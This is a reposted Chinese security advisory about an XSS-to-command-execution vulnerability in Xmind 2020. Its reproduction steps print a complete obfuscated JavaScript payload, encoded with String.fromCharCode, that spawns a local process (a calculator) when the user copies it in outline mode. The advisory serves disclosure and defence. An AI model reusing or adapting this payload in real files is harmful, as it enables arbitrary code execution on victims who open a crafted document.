【安全通报】Xmind 2020 存在XSS导致命令执行漏洞
2021-05-11 09:41:13 Author: nosec.org(查看原文) 阅读量:330 收藏

QQ截图20210510160017.png

近日,白帽汇安全研究院监测到 Xmind2020 存在XSS漏洞,攻击者可利用该漏洞进行命令执行。危害较大,建议广大用户不要打开来历不明的 xmind文档。

漏洞描述

XMind是功能齐全的思维导图和头脑风暴工具,主要用途为帮助用户捕捉想法,组织各类报表。由于软件允许用户以文件形式或自定义标题标题的形式存储JS代码,攻击者可以发送带有恶意JS代码的文件。用户打开文件后,从而执行攻击者预先设定好的命令。该漏洞评分:8.8,危害等级:高危。

影响版本

经测试,从官网上下载最新的 Linux-amd-64bit-10.3.1-202101132117,仍可进行命令执行。

复现步骤

测试环境:ubuntu-20.04

打开xmind后,在思维导图模式下输入以下Payload:

<img src=x onerror=writeln(String.fromCharCode(60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))>

image-20210510172401068.png

点击大纲。在大纲模式下,选中payload,按下Ctrl+C快捷键触发该Payload,执行calc命令。

QQ截图20210510163602.png

修复方案

目前没有详细的解决方案提供,建议关注厂商主页更新,及时升级版本或更新漏洞补丁。

参考

[1] https://www.exploit-db.com/exploits/49827

[2] https://mp.weixin.qq.com/s/JCj4yPN5ORGt1WGc7gpuDQ

白帽汇从事信息安全,专注于安全大数据、企业威胁情报。

公司产品:FOFA-网络空间安全搜索引擎、FOEYE-网络空间检索系统、NOSEC-安全讯息平台。

为您提供:网络空间测绘、企业资产收集、企业威胁情报、应急响应服务。


文章来源: https://nosec.org/home/detail/4754.html
如有侵权请联系:admin#unsafe.sh